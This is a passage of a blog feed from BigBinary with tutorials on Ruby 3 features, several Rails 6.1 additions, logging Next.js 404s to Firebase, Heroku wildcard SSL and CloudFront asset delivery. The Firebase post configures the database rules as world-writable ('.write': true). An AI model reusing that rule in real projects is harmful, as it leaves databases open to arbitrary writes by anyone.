                    email: String,
                    age: Integer) -&gt; [String, String, Integer]
end
</code></pre><h2>Other Ruby 3 features and changes</h2><p>Over this 7-year period, the Ruby community has seen significant improvements in performance and other aspects. Apart from the major goals, Ruby 3 is an exciting update with lots of new features, handy syntactic changes, and new enhancements. In this section, we will discuss some notable features.</p><blockquote><p>We are making Ruby even better. - Matz</p></blockquote><h3>One-line pattern matching syntax change</h3><p>Previously, one-line pattern matching used the keyword <code>in</code>. In Ruby 3.0 it is written with <code>=&gt;</code> instead (the <code>in</code> form still exists, but now returns a boolean rather than raising on a mismatch).</p><h6>Ruby 2.7</h6><pre><code class="language-ruby">{ name: 'John', role: 'CTO' } in {name:}
p name # =&gt; 'John'
</code></pre><h6>Ruby 3.0</h6><pre><code class="language-ruby">{ name: 'John', role: 'CTO' } =&gt; {name:}
p name # =&gt; 'John'
</code></pre><h3>Find pattern</h3><p>The <a href="https://github.com/ruby/ruby/blob/9738f96fcfe50b2a605e350bdd40bd7a85665f54/test/ruby/test_pattern_matching.rb">find pattern</a> was introduced in <code>Ruby 2.7</code> as an experimental feature. It is now part of <code>Ruby 3.0</code>. 
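</p><p>A find pattern proper scans a collection for an element matching a sub-pattern, with <code>*</code> splats on both sides. Here is a minimal sketch (the data is made up for illustration; on Ruby 3.0 this pattern may still print an experimental-feature warning):</p><pre><code class="language-ruby">users = [
  { name: 'Sam', role: 'Manager' },
  { name: 'Oliver', role: 'CTO' },
  { name: 'Eve' }
]

# [*, pattern, *] searches the array for the first element matching
# the inner hash pattern and binds name from that element.
found =
  case users
  in [*, { name:, role: 'CTO' }, *]
    name
  end

puts found # prints Oliver
</code></pre><p>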
It is similar to pattern matching in <code>Elixir</code> or <code>Haskell</code>.</p><pre><code class="language-ruby">users = [
  { name: 'Oliver', role: 'CTO' },
  { name: 'Sam', role: 'Manager' },
  { role: 'customer' },
  { name: 'Eve', city: 'New York' },
  { name: 'Peter' },
  { city: 'Chicago' }
]

users.each do |person|
  case person
  in { name:, role: 'CTO' }
    p &quot;#{name} is the Founder.&quot;
  in { name:, role: designation }
    p &quot;#{name} is a #{designation}.&quot;
  in { name:, city: 'New York' }
    p &quot;#{name} lives in New York.&quot;
  in { role: designation }
    p &quot;Unknown is a #{designation}.&quot;
  in { name: }
    p &quot;#{name}'s designation is unknown.&quot;
  else
    p &quot;Pattern not found.&quot;
  end
end

# Output:
# &quot;Oliver is the Founder.&quot;
# &quot;Sam is a Manager.&quot;
# &quot;Unknown is a customer.&quot;
# &quot;Eve lives in New York.&quot;
# &quot;Peter's designation is unknown.&quot;
# &quot;Pattern not found.&quot;
</code></pre><h3>Endless Method definition</h3><p>This is another syntax enhancement that is optional to use. It enables us to create method definitions <a href="https://bigbinary.com/blog/ruby-3-adds-endless-method-definition">without the end keyword</a>.</p><pre><code class="language-ruby">def increment(x) = x + 1

p increment(42) #=&gt; 43
</code></pre><h3>Except method in Hash</h3><p>Sometimes while working on a non-Rails app I get <code>undefined method except</code>. The <code>except</code> method was available only in Rails. In Ruby 3, <code>Hash#except</code> was <a href="https://bigbinary.com/blog/ruby-3-adds-new-method-hash-except">added to Ruby</a> itself.</p><pre><code class="language-ruby">user = { name: 'Oliver', age: 29, role: 'CTO' }

user.except(:role) #=&gt; {:name=&gt;&quot;Oliver&quot;, :age=&gt;29}
</code></pre><h3>Memory View</h3><p>This is again an experimental feature. It is a C API that allows extension libraries to exchange raw memory areas. 
Extension libraries can also share metadata of the memory area consisting of its shape and element format. It was inspired by <a href="https://docs.python.org/3/c-api/buffer.html">Python's buffer protocol</a>.</p><h3>Arguments forwarding</h3><p>Arguments forwarding <code>(...)</code> now supports leading arguments.</p><p>It is helpful in <code>method_missing</code>, where we need the method name as well.</p><pre><code class="language-ruby">def method_missing(name, ...)
  if name.to_s.end_with?('?')
    self[name]
  else
    fallback(name, ...)
  end
end
</code></pre><h3>Other Notable changes</h3><ul><li>Pasting in IRB is much faster.</li><li>The order of the backtrace has been <a href="https://bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order">reversed</a>. The error message and line number are printed first; the rest of the backtrace is printed later.</li><li><a href="https://bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument">Hash#transform_keys</a> accepts a hash that maps old keys to new keys.</li><li>Interpolated String literals are no longer frozen when <code># frozen_string_literal: true</code> is used.</li><li>Symbol#to_proc now returns a lambda Proc.</li><li><a href="https://bigbinary.com/blog/ruby-3-adds-symbol-name">Symbol#name</a> has been added, which returns the symbol's name as a frozen string.</li></ul><p>Many other changes can be found in the <a href="https://github.com/ruby/ruby/blob/v3_0_0_preview2/NEWS.md">Ruby 3 News</a>.</p><h2>Transition</h2><p>A lot of core libraries have been modified to fit the goals of Ruby 3. But this doesn't mean that our old applications will suddenly stop working. The Ruby team has made sure that these changes are backward compatible. We might see some deprecation warnings in our existing code. Developers can fix these warnings to smoothly transition from an old version to the new version. 
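</p><p>The most common warning of this kind comes from keyword-argument separation: Ruby 2.7 warned when a trailing hash was implicitly converted to keyword arguments, and Ruby 3.0 makes the separation strict. A minimal sketch (the method here is purely illustrative):</p><pre><code class="language-ruby">def greet(name:, greeting: 'Hello')
  format('%s, %s', greeting, name)
end

opts = { name: 'Ruby' }

# greet(opts) printed a deprecation warning on Ruby 2.7 and raises
# ArgumentError on Ruby 3.0; the explicit double splat works on both.
puts greet(**opts) # prints Hello, Ruby
</code></pre><p>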
We are all set to use the new features and enjoy all the new performance improvements.</p><h2>Conclusion</h2><p>With great improvements in performance, memory utilization, and static analysis, and new features like Ractors and schedulers, we have great confidence in the future of Ruby. With Ruby 3, applications can be more scalable and more enjoyable to work on. The coming year 2021 is not just a new year but rather a new era for all Rubyists. We at BigBinary thank everyone who contributed towards the Ruby 3 release, directly or indirectly.</p><p>Happy Holidays and Happy New Year, folks!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Catch 404 URLs in Next.js and write them to Firebase]]></title>
       <author><name>Piyush Sinha</name></author>
      <link href="https://www.bigbinary.com/blog/catch-404-urls-in-nextjs"/>
      <updated>2020-12-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/catch-404-urls-in-nextjs</id>
      <content type="html"><![CDATA[<p>We recently jumped on the <a href="https://www.netlify.com/jamstack/">Jamstack</a> bandwagon and moved our BigBinary website to <a href="https://nextjs.org">Next.js</a>. We also migrated the <a href="https://bigbinary.com/blog">BigBinary Blog</a> to Next.js.</p><p>In the process of migration, we knew we might have missed handling a few URLs. We wanted to know all the URLs which now result in a 404.</p><p>Traditionally, a static site is not able to catch all the 404s. However, with Next.js we can capture the URLs resulting in a 404 and write those URLs to Firebase.</p><h3>Setting up Firebase</h3><p>Get started with <a href="https://console.firebase.google.com/">Firebase</a> and create an account. Add a project there and then add a &quot;Web app&quot; inside that project. After that, you will find the web app's Firebase configuration, something like this:</p><pre><code class="language-js">var firebaseConfig = {
  apiKey: &quot;XXXXXXXXXXXXXXXXXXXXXXXX&quot;,
  authDomain: &quot;test-XXXX.firebaseapp.com&quot;,
  databaseURL: &quot;https://test-XXXX-default-rtdb.firebaseio.com&quot;,
  projectId: &quot;test-XXXX&quot;,
  storageBucket: &quot;test-XXX.appspot.com&quot;,
  messagingSenderId: &quot;00000000000&quot;,
  appId: &quot;1:00000000:web:XXXXX00000XXXXXXX&quot;
};
</code></pre><p>Edit the rules in the Rules section like this:</p><pre><code class="language-json">{
  &quot;rules&quot;: {
    &quot;.read&quot;: false,
    &quot;.write&quot;: true
  }
}
</code></pre><h3>Creating a custom 404</h3><p>To create a custom 404 page, create a <code>pages/404.js</code> file. At build time this file is statically generated and serves as the 404 page for the application. This page would look like this:</p><pre><code class="language-javascript">import { useEffect } from &quot;react&quot;;
import firebase from &quot;firebase&quot;;

export default function Custom404() {
  useEffect(() =&gt; {
    const firebaseConfig = {
      apiKey: &quot;XXXXXXXXXXXXXXXXXXXXXXXX&quot;,
      authDomain: &quot;test-XXXX.firebaseapp.com&quot;,
      databaseURL: &quot;https://test-XXXX-default-rtdb.firebaseio.com&quot;,
      projectId: &quot;test-XXXX&quot;,
      storageBucket: &quot;test-XXX.appspot.com&quot;,
      messagingSenderId: &quot;00000000000&quot;,
      appId: &quot;1:00000000:web:XXXXX00000XXXXXXX&quot;
    };

    firebase
      .initializeApp(firebaseConfig)
      .database()
      .ref()
      .child(&quot;404s&quot;)
      .push(window.location.href);
  }, []);

  return &lt;h1&gt;404 - Page Not Found&lt;/h1&gt;;
}
</code></pre><p>Now all the 404s will be caught and written to Firebase.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds where.associated to check association presence]]></title>
       <author><name>Nithin Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-where-associated-to-check-association-presence"/>
      <updated>2020-12-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-where-associated-to-check-association-presence</id>
      <content type="html"><![CDATA[<p>Rails 6.1 simplifies checking whether an association exists by adding a new <code>associated</code> method.</p><p>Let's see an example of it.</p><pre><code class="language-ruby">class Account &lt; ApplicationRecord
  has_many :users, -&gt; { joins(:contact).where.not(contact_id: nil) }
end
</code></pre><p>This will return all users with contacts. If we rephrase that sentence, we can say that &quot;this will return all users who are associated with contacts&quot;.</p><p>Let's see how we can do the same with the new <code>associated</code> method.</p><pre><code class="language-ruby">class Account &lt; ApplicationRecord
  has_many :users, -&gt; { where.associated(:contact) }
end
</code></pre><p>We can see that using <code>associated</code> removes some of the syntactic noise we saw in the first example. This method is essentially syntactic sugar over an inner join on <code>:contact</code>.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40696">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 supports transforming hash keys using a hash argument]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument"/>
      <updated>2020-12-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument</id>
      <content type="html"><![CDATA[<p>From Ruby 3 onwards, the <code>Hash#transform_keys</code> method accepts a hash argument for transforming existing keys to new keys, as specified in the argument.</p><h5>Usage before Ruby 3</h5><p>The following example shows how we used to apply <code>transform_keys</code>:</p><pre><code class="language-ruby"># 1. Declare address hash
irb(main)&gt; address = {House: 'Kizhakkethara', house_no: 123, locality: 'India'}
=&gt; {:House=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}

# 2. Lowercase all the keys
irb(main)&gt; address.transform_keys(&amp;:downcase)
=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}

# 3. Replace a particular key with a new key along with lowercasing
irb(main)* address.transform_keys do |key|
irb(main)*   new_key = key
irb(main)*   if key == :locality
irb(main)*     new_key = :country
irb(main)*   end
irb(main)*   new_key.to_s.downcase.to_sym
irb(main)&gt; end
=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}
</code></pre><p>Although the changes required are trivial, we ended up writing a block to do the job. But what happens when the number of keys that need to be transformed increases? Do we need to write n conditions within a block? Not anymore!</p><h5>Introducing Hash#transform_keys with hash argument</h5><p>Let's take the same example and provide a hash, which will be used for the transformation:</p><pre><code class="language-ruby"># 1. Declare address hash
irb(main)&gt; address = {House: 'Kizhakkethara', house_no: 123, locality: 'India'}
=&gt; {:House=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}

# 2. Provide hash with transform_keys
irb(main)&gt; address.transform_keys({House: :house, locality: :country})
=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}
</code></pre><p>That does the job. But let's try to improve this code. Ultimately, when we invoke the method, it goes through each of the keys in our hash and maps the existing keys to the new keys. The <code>transform_keys</code> method also accepts a block as a parameter, so let's pass in the <code>downcase</code> method as a <code>Proc</code> argument:</p><pre><code class="language-ruby"># 1. Passing in block parameters
irb(main)&gt; address.transform_keys({locality: :country}, &amp;:downcase)
=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}
</code></pre><p>An important point to note about the block parameter is that <strong>it's only applied to keys which are not specified in the hash argument</strong>.</p><h3>Other common use cases</h3><h5>Transforming params received in the Rails controller</h5><pre><code class="language-ruby"># 1. Declare params
irb(rails)&gt; params = ActionController::Parameters.new({&quot;firstName&quot;=&gt;&quot;oliver&quot;, &quot;lastName&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;})
=&gt; &lt;ActionController::Parameters {&quot;firstName&quot;=&gt;&quot;oliver&quot;, &quot;lastName&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: false&gt;

# 2. Convert camelCase to snake_case using block parameter
irb(rails)&gt; params.permit(:firstName, :lastName, :email).transform_keys(&amp;:underscore)
=&gt; &lt;ActionController::Parameters {&quot;first_name&quot;=&gt;&quot;oliver&quot;, &quot;last_name&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: true&gt;

# 3. Or using hash argument
irb(rails)&gt; params.permit(:firstName, :lastName, :email).transform_keys({firstName: 'first_name', lastName: 'last_name'})
=&gt; &lt;ActionController::Parameters {&quot;first_name&quot;=&gt;&quot;oliver&quot;, &quot;last_name&quot;=&gt;&quot;smith&quot;, &quot;email&quot;=&gt;&quot;oliver@bigbinary.com&quot;} permitted: true&gt;
</code></pre><h5>Slicing hash along with key transformation</h5><pre><code class="language-ruby">irb(main)&gt; address.transform_keys({locality: :country}).slice(:house_no, :country)
=&gt; {:house_no=&gt;123, :country=&gt;&quot;India&quot;}
</code></pre><h5>Transforming keys in place using bang counterpart</h5><pre><code class="language-ruby">irb(main)&gt; address.transform_keys!({locality: :country}, &amp;:downcase)
irb(main)&gt; address
=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}
</code></pre><h5>References</h5><ul><li>Discussions regarding this feature can be found <a href="https://bugs.ruby-lang.org/issues/16274?tab=history">here</a>.</li><li>The commit for this feature can be found <a href="https://github.com/ruby/ruby/commit/b25e27277dc39f25cfca4db8452d254f6cc8046e">here</a>.</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 raises an error for impossible camelcase inflections]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-raises-error-for-impossible-camelcase-inflections"/>
      <updated>2020-12-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-raises-error-for-impossible-camelcase-inflections</id>
      <content type="html"><![CDATA[<p>From Rails 6.1 onwards, the default behavior of the Rails generator when encountering an impossible &quot;camelCase&quot; inflection is to raise an error, rather than generating a name that will cause problems.</p><h3>What are impossible &quot;camelCase&quot; inflections?</h3><p>The <a href="https://api.rubyonrails.org/classes/ActiveSupport/Inflector/Inflections.html">Rails Inflector</a> is part of the <code>ActiveSupport</code> module, and it ships with patterns to transform Ruby strings. This library is responsible for pluralization and/or singularization of strings.</p><p>The Inflector tries its best to provide the desired result given a string. But sometimes, with certain words, it can't provide, say, the pluralized version out of the box.</p><p>Let's say, for example, the string is <code>DSL</code>. The desired plural form is <code>DSLs</code>. But the Inflector gets confused about what exactly the desired plural form is, or more accurately, what exactly the underscored resource name is, and it used to generate inconsistent class names.</p><h3>Before Rails 6.1</h3><p>Let's try out the following example.</p><pre><code class="language-bash">bundle exec rails g scaffold DSL field</code></pre><p>In the output we can see that the controller filename is <code>ds_ls_controller.rb</code> and the controller class name is:</p><pre><code class="language-ruby">class DsLsController &lt; ApplicationController</code></pre><p>And the routes file is populated with:</p><pre><code class="language-ruby">resources :dsls</code></pre><p>You see the problem, right?</p><p>The generated route <code>:dsls</code> expects a <code>DslsController</code>, but the controller generated is <code>DsLsController</code>. This will lead to a routing error.</p><h3>How does Rails 6.1 solve this problem?</h3><p>The Rails team decided that it would be better to terminate the generation process with an error rather than generate classes that are internally inconsistent.</p><p>Thus Rails now raises an error in the following two scenarios, where the casing is impossible to inflect:</p><p>The first case is when a &quot;camelCase&quot; model name is passed to a generator. The second case is when the full round trip from pluralize to singularize does not match the original singular value. Rails checks for the following condition.</p><pre><code class="language-ruby">name.pluralize.underscore.singularize != name.underscore.singularize</code></pre><p>We can try out the same example from the previous section, and it will produce the following output:</p><pre><code class="language-text">Rails cannot recover the underscored form from its camelcase form 'DSL'.
Please use an underscored name instead, either 'dsl' or 'ds_l'.
Or set up custom inflection rules for this noun before running the generator in config/initializers/inflections.rb.
</code></pre><p>This allows developers to either rephrase the resource name with an underscored name from the very beginning, or follow the suggestion, that is, to create a custom inflection.</p><h3>Creating a custom inflection</h3><p><code>ActiveSupport::Inflector</code> provides us with the <code>inflections</code> method in order to create our own custom inflections. This method can even accept an optional locale, which comes in handy when we are writing inflection rules for languages other than <code>:en</code>, which is the default locale.</p><p>You can have a detailed look at the inflection methods over <a href="https://api.rubyonrails.org/classes/ActiveSupport/Inflector/Inflections.html">here</a>.</p><p>Let's try to make the above example work and get the desired underscored name for the string <code>DSL</code>. We're dealing with an irregular inflection. Thus we can make use of the <code>irregular</code> method, which takes two arguments: the singular and the plural form of the word as strings.</p><p>Let's just add the custom inflection into <code>config/initializers/inflections.rb</code>:</p><pre><code class="language-ruby"># We provide the string in lowercase format
ActiveSupport::Inflector.inflections(:en) do |inflect|
  inflect.irregular 'dsl', 'dsls'
end
</code></pre><p>Voila! That's it.</p><p>Now if we run <code>rails g scaffold DSL</code>, we will be able to get the correct file and class names.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39832">pull request</a> and <a href="https://github.com/rails/rails/issues/39117">the issue</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows associations to be destroyed asynchronously]]></title>
       <author><name>Srijan Kapoor</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-associations-to-support-destroy_async-option-with-dependent-key"/>
      <updated>2020-12-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-associations-to-support-destroy_async-option-with-dependent-key</id>
      <content type="html"><![CDATA[<p>In Rails 6.1, Rails will enqueue a background job to destroy associated records if <code>dependent: :destroy_async</code> is set up.</p><p>Let's consider the following example.</p><pre><code class="language-ruby">class Team &lt; ApplicationRecord
  has_many :players, dependent: :destroy_async
end

class Player &lt; ApplicationRecord
  belongs_to :team
end
</code></pre><p>Now, if we call the <code>destroy</code> method on an instance of class <code>Team</code>, Rails will enqueue an asynchronous job to delete the associated <code>players</code> records.</p><p>We can verify this asynchronous job with the following test case.</p><pre><code class="language-ruby">class TeamTest &lt; ActiveSupport::TestCase
  include ActiveJob::TestHelper

  test &quot;destroying a record destroys the associations using a background job&quot; do
    team = Team.create!(name: &quot;Portugal&quot;, manager: &quot;Fernando Santos&quot;)
    player1 = Player.new(name: &quot;Bernardo Silva&quot;)
    player2 = Player.new(name: &quot;Diogo Jota&quot;)
    team.players &lt;&lt; [player1, player2]
    team.save!

    team.destroy

    assert_enqueued_jobs 1
    assert_difference -&gt; { Player.count }, -2 do
      perform_enqueued_jobs
    end
  end
end
</code></pre><pre><code class="language-text">Finished in 0.232213s, 4.3064 runs/s, 8.6128 assertions/s.
1 runs, 2 assertions, 0 failures, 0 errors, 0 skips
</code></pre><p>Alternatively, this enqueue behavior can also be demonstrated in the <code>rails console</code>.</p><pre><code class="language-ruby">irb(main):011:0&gt; team.destroy
  TRANSACTION (0.1ms)  begin transaction
  Player Load (0.6ms)  SELECT &quot;players&quot;.* FROM &quot;players&quot; WHERE &quot;players&quot;.&quot;team_id&quot; = ?  [[&quot;team_id&quot;, 6]]
Enqueued ActiveRecord::DestroyAssociationAsyncJob (Job ID: 4df07c2d-f55b-48c9-8c20-545b086adca2) to Async(active_record_destroy) with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;6, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1, 2], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}
Performed ActiveRecord::DestroyAssociationAsyncJob (Job ID: 4df07c2d-f55b-48c9-8c20-545b086adca2) from Async(active_record_destroy) in 34.5ms
</code></pre><p>However, this behaviour is inconsistent, and the <code>destroy_async</code> option should not be used when the association is backed by foreign key constraints in the database.</p><p>Let us consider another example.</p><p><strong>CASE:</strong> With a simple foreign key on the <code>team_id</code> column in place.</p><pre><code class="language-ruby">irb(main):015:0&gt; team.destroy
  TRANSACTION (0.1ms)  begin transaction
  Player Load (0.1ms)  SELECT &quot;players&quot;.* FROM &quot;players&quot; WHERE &quot;players&quot;.&quot;team_id&quot; = ?  [[&quot;team_id&quot;, 7]]
Enqueued ActiveRecord::DestroyAssociationAsyncJob (Job ID: 69e51e5f-5b59-4095-92db-90aab73a7f65) to Async(default) with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;7, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}
  Team Destroy (0.9ms)  DELETE FROM &quot;teams&quot; WHERE &quot;teams&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 7]]
  TRANSACTION (1.1ms)  rollback transaction
Performing ActiveRecord::DestroyAssociationAsyncJob (Job ID: 69e51e5f-5b59-4095-92db-90aab73a7f65) from Async(default) enqueued at 2021-01-03T21:10:21Z with arguments: {:owner_model_name=&gt;&quot;Team&quot;, :owner_id=&gt;7, :association_class=&gt;&quot;Player&quot;, :association_ids=&gt;[1], :association_primary_key_column=&gt;:id, :ensuring_owner_was_method=&gt;nil}
Traceback (most recent call last):
        1: from (irb):15
ActiveRecord::InvalidForeignKey (SQLite3::ConstraintException: FOREIGN KEY constraint failed)
</code></pre><p>An exception is raised by Rails, and the record is not destroyed.</p><p><strong>CASE:</strong> With a cascading foreign key using <code>on_delete: :cascade</code></p><p>Here, even though <code>ActiveRecord::DestroyAssociationAsyncJob</code> would run to successful completion, the associated <code>players</code> records would already have been deleted inside the same transaction block destroying the <code>team</code> record, and that would skip any destroy callbacks like <code>before_destroy</code>, <code>after_destroy</code> or <code>after_commit on: :destroy</code>.</p><p>This makes using <code>destroy_async</code> redundant in such a case.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40157">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up wild card SSL on heroku]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/wild-card-ssl-on-heroku"/>
      <updated>2020-12-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/wild-card-ssl-on-heroku</id>
      <content type="html"><![CDATA[<p>Setting up wild card SSL on Heroku can be complicated. Recently I had to set it up for a new domain, and this time I recorded the whole process.</p><p>The SSL certificate in this example was bought from Namecheap, but the same process would apply for other vendors too.</p><p>The video of the whole process is available here.</p><p><iframe width="100%" height="315" src="https://www.youtube.com/embed/A6URYtDWZhg" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><h3>Script to generate keys</h3><pre><code class="language-bash">openssl req -new -newkey rsa:2048 -nodes -keyout server.key -out server.csr</code></pre><p>When the prompt asks for the <code>Common Name (fully qualified host name)</code>, enter <code>*.yourdomainname.com</code>. Since we are setting up a wild card certificate, it's important that the common name starts with a <code>*</code>. Otherwise we are going to get an error later.</p><p>Apart from the above mentioned question, the answers to the other questions do not matter at all. You can enter junk values and the SSL will work just fine.</p><p>Hit enter when a challenge password is requested.</p><h3>Script to generate ssl bundle</h3><pre><code class="language-bash">$ cat __neetohelp_net.crt __neetohelp_net.ca-bundle &gt; ssl-bundle.crt</code></pre><p>Note that the order of the crt and bundle files matters when combining them.</p><p>Secondly, as shown in the video, we might have to split a combined line. Now let's examine the contents of the combined file.</p><pre><code class="language-bash">$ cat ssl-bundle.crt</code></pre><p>If we see a line like the one below:</p><pre><code class="language-plaintext">-----END CERTIFICATE----------BEGIN CERTIFICATE-----</code></pre><p>then we need to split that line so that the <code>END CERTIFICATE</code> and <code>BEGIN CERTIFICATE</code> markers land on separate lines, like so:</p><pre><code class="language-plaintext">-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----</code></pre>]]></content>
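To make the line-splitting step concrete, here is a small plain-Ruby sketch, not from the original post, that repairs a bundle string whose END and BEGIN markers were concatenated onto one line:

```ruby
# Sketch: repair a concatenated PEM bundle by re-inserting the missing
# newline between the END and BEGIN certificate markers.
bundle = "-----END CERTIFICATE----------BEGIN CERTIFICATE-----"
fixed = bundle.gsub("CERTIFICATE----------BEGIN",
                    "CERTIFICATE-----\n-----BEGIN")
puts fixed
```

In practice you would read `ssl-bundle.crt`, apply the substitution, and write the file back, but the string round-trip above shows the whole transformation.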
    </entry><entry>
       <title><![CDATA[Reduce asset delivery time from 30 to 3 seconds with CDN]]></title>
       <author><name>Vinay Chandran</name></author>
      <link href="https://www.bigbinary.com/blog/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds"/>
      <updated>2020-11-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds</id>
      <content type="html"><![CDATA[<p><a href="https://aceinvoice.com">AceInvoice</a>, one of BigBinary's products, was facing high page load times. AceInvoice is a React.js application, and the size of <code>application.js</code> had gone up to 689kB compressed. Folks from India would sometimes have to wait up to 30 whole seconds for the <code>application.js</code> to load.</p><p>AceInvoice is hosted on Heroku. Heroku serves assets from a limited number of servers in select locations. The farther you are from these servers, the higher the latency of asset delivery. This is where a CDN like Cloudfront can help.</p><h2>How does Cloudfront work?</h2><p>Simply stated, CDNs are like caches. A CDN caches recently requested items and can then serve them from the cache at great speed.</p><h5>Let's take a practical example</h5><ul><li>Create a Cloudfront distribution <code>aceinvoice.cloudfront.com</code> which points to <code>app.aceinvoice.com</code>.</li><li>The browser makes a request to <code>aceinvoice.cloudfront.com/images/peter.jpg</code> for the first time.</li><li>Cloudfront checks if it has anything cached against <code>/images/peter.jpg</code>. Since it's the first time it's encountering this URL, it won't find anything, so it's a cache miss.</li><li>Cloudfront forwards this request back to the origin, which in this case is <code>app.aceinvoice.com/images/peter.jpg</code>. The browser gets back the image.</li><li>During this process, Cloudfront caches the resource. Think of it like a key-value pair where <code>/images/peter.jpg</code> is the key and the actual image is the value.</li></ul><h5>Now let's consider another scenario</h5><ul><li>Another browser makes a request to the same resource.</li><li>Cloudfront checks for cached items for that particular path.</li><li>Cloudfront finds the cached resource. It's a cache hit!</li><li>Cloudfront directly serves the resource back to the browser without hitting the origin server.</li></ul><h2>So how is this faster?</h2><p>Cloudfront has 100+ edge locations scattered around the world. There will always be an edge that's close to you. Cached resources are immediately made available from all these edge locations. This reduces latency.</p><h2>What are the caveats?</h2><p>The biggest issue with using a CDN is properly invalidating caches. Let's continue with the above example. If the <code>peter.jpg</code> file is updated, Cloudfront is unaware of this change. It'll keep serving the old file whenever a request is made to that path.</p><p>The easiest way to invalidate the cache is by using a hash in the asset name that changes on deploy. Rails handles this by default. After deploying the application, the path to the aforementioned asset might be <code>images/peter-5nbd44gfae.jpg</code>. When a request comes to this path, Cloudfront caches it and uses the cache for subsequent requests.</p><p>But on the next deploy, the path to the same asset changes. Since Cloudfront doesn't have anything cached for that URL, it will check the origin and get the latest asset.</p><hr><h2>How to set up Cloudfront with Rails</h2><p>Rails makes it easy to set up an asset host. In the <code>config/environments/production.rb</code> file, add the following line.</p><pre><code class="language-ruby">config.action_controller.asset_host = ENV[&quot;CLOUDFRONT_ENDPOINT&quot;]</code></pre><p>By doing this, Rails will look for all the assets in Cloudfront.</p><p>Let's consider the <code>application.js</code> asset. In the main <code>.erb</code> file the <code>src</code> for <code>application.js</code> was <code>/packs/js/application.js</code>.</p><p>Once we make this change it will be <code>https://CLOUDFRONT_ENDPOINT/packs/js/application.js</code>.</p><p>We will be setting the environment variable in Heroku shortly.</p><h5>Creating a Cloudfront distribution</h5><ol><li><p>Go to AWS Management Console -&gt; Cloudfront -&gt; Create Distribution. Choose <em>Web</em> as the delivery method.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/delivery-method.png" alt="Setting delivery method"></p></li><li><p>In origin domain name, specify the path to your server. In this example it is <code>app.aceinvoice.com</code>. In origin protocol policy, choose <em>Match viewer</em> so that the same protocol as the main request is used when Cloudfront forwards requests to the origin server. You can leave the other settings unchanged.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/origin-settings.png" alt="Origin settings"></p></li><li><p>In the cache behaviour settings, change viewer protocol policy to <em>Redirect HTTP to HTTPS</em>. You can leave the other settings untouched.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/cache-behavior.png" alt="Cache behavior"></p></li><li><p>At the bottom of the page switch the distribution state to <em>Enabled</em> and click on <em>Create Distribution</em>.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/distribution-state.png" alt="Distribution state"></p></li><li><p>Note the <em>Domain name</em> of your distribution from the Cloudfront dashboard.<img 